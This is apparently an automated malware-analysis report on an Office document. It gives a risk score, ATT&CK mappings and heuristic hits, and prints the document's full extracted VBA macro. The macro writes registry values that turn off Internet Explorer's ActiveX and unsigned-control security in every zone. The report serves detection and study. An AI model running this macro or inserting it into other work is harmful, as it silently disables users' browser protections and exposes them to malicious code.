MALICIOUS
160
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The VBA script uses WScript.Shell to write registry values that lower Internet Explorer's security settings for local intranet and trusted sites zones. This is likely intended to bypass security warnings and facilitate the execution of malicious content or further exploitation. The script explicitly targets registry keys such as HKEY_CURRENT_USER\SOFTWARE\MICrosOFT\WINdows\CurrentVersION\Internet settings\Zones\1\1405.
Heuristics 4
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
MsgBox "Achtung, Active X Security of Internetexplorer off!!!" Set WSHShell = CreateObject("WScript.Shell") For i = 1 To 4 -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
MsgBox "Achtung, Active X Security of Internetexplorer off!!!" Set WSHShell = CreateObject("WScript.Shell") For i = 1 To 4 -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1047 bytes |
SHA-256: 4fe30b3bc177625d2baa1ace0d754953219c18ce161baeb2e696e47547774a6b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Modul1"
'this script was written by Edrin@gmx.net
MsgBox "Achtung, Active X Security of Internetexplorer off!!!"
Set WSHShell = CreateObject("WScript.Shell")
For i = 1 To 4
' To trun off localhost-protection(127.0.0.1): i = 0 ()
' Warning: You can´t reset this with options of internet explorer! you have to reset it in registry yourself!!!!!
key = "HKEY_CURRENT_USER\SOFTWARE\MICrosOFT\WINdows\CurrentVersION\Internet settings\Zones\" + chr(i + 48) + "\"
' Chr(49) -> 1 in ASCII
A1 = key + "1405"
A2 = key + "1201"
A3 = key + "1001"
A4 = key + "1004"
WSHShell.RegWrite A1, 0, "REG_DWORD"
WSHShell.RegWrite A2, 0, "REG_DWORD"
WSHShell.RegWrite A3, 0, "REG_DWORD"
WSHShell.RegWrite A4, 0, "REG_DWORD"
Next
MsgBox "Done"
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.